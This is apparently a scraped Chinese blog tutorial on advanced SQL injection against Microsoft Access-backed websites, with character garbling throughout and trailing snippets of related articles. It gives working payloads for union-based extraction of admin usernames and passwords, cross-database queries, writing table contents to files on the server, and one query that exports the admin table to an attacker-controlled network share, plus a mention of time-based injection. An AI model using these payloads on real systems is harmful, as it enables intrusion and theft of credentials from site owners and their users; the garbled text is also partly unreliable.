access高階注入語句

2021-09-23 17:02:17 字數 1605 閱讀 4223

union查詢法

首先要說的就是查詢辦法,一般的查詢辦法就是

程式**

and 1=(select count(*) from admin where left(id,1)=『1』)

這樣開始判斷了…就算你使用各種各樣的工具,也是乙個個字的去猜去判斷對不對,不對再換乙個.這樣的壞處顯而易見,慢. 特別是在猜測經過32位md5加密過的段的時候…基本上你可以去泡壺茶再喝一杯.

所以這個時候,union select橫空出現.別以為只能在php裡用哦…

譬如你有乙個access點:

程式**

知道存在admin表(你當然可以拿個工具先快速猜出表和字段來),

然後我們直接來:

程式**

union select 1,2,3,4,5,6… from admin [where coderx=1(如果有限制查詢條件)]

這裡從1開始加到回顯正常為止.然後替換url裡相應在頁面出現的1~x為password,username之類的東西,就可以直接暴內容了.多方便,多快捷.茶可以先放放,涼一些再來喝了.

access跨庫查詢

有時候某個**伺服器上有兩個以上系統,你發現其中乙個有access注入點,但是後台沒法提權,另外乙個系統沒有注入點,但是後台卻有你需要的功能.那麼這個時候,跨庫來了.當然,你還可以用來mdb溢位,滲透的過程等等.他的作用往往是意想不到的.

跨庫的查詢語句:

子查詢:

程式**

and (select count(*) from [d:\tianyang\backdoor\xiaoyang.mdb].test)>0

union查詢:

程式**

union select 1,2,3,4… from admin in 「d:\xioatianyang\okok.asa」 where id=1

跨庫的作用當然不只這些了,大夥繼續發揮吧…這裡提供兩篇參考過的文章連線:

程式**

access注入,匯出txt,htm,html

子查詢語句:

程式**

select * into [test.txt] in 『d:\web』 『text;』 from admin

這樣就把admin表的內容以test型別存進了d:\web裡面.

union查詢:

程式**

union select * into [admin.txt] in 『c:』 『test;』 from admin

而且這裡也可以儲存到本地來:

程式**

select * into [test.txt] in 『\yourip\share』 『text;』 from admin

不過,很多人包括我自己測試,本機資料庫來操作是沒問題的,但是一旦在注入點上,子查詢會回顯沒有許可權,union會回顯動作查詢不能作為行的**.可以說還是個難題…原因大概是union只適用查詢結合,union後面不能跟動作.和這個內容相關的,本論壇已有一帖:

程式**

因為網上有許多和這相關的資料,所以我還是把他引進來了.如果一旦這方法運用成功的話,理論上我們只要知道表名,不需要知道段名,就可以看到該錶所有內容了.或者我們可以建.php.tianyang asp.asp之類的檔案或者目錄來導進檔案~還是會很強大的.

ACCESS延時注入

這也算是個新知識吧。今天遇到個站,實實在在存在注入,但是弄不出欄位。本應該可以用便宜注入。但是不知道為什麼就是就是弄不出來.payload select count from msysaccessobjects as t1,msysaccessobjects as t2,msysaccessobje...

SQL注入實戰 防注入 Access

這道題目算是給了sql注入另外的思路了。一般而言我們測試sql注入會選擇那些有直接顯示的地方 比如id 1,name 但這會侷限你的思維,所以一定要多多培養做題的思路才能應對各種情況。下面會給出不一樣的思路 1.這是墨者學院一道有waf的sql注入,有很多人遇到有waf的環境就感覺頭大,確實繞waf...

SQL注入之ACCESS注入筆記

以.mdb字尾命名 乙個檔案就是乙個庫,和mysql不同 開啟方式用office或者第三方工具 表名 欄位名 資料內容step1 判斷注入是否存在 step2 猜解表名 step3 猜解字段數 step4 猜解欄位名 step5 猜解內容長度 step6 猜解內容 單引號報錯,因為在sql語句中單引...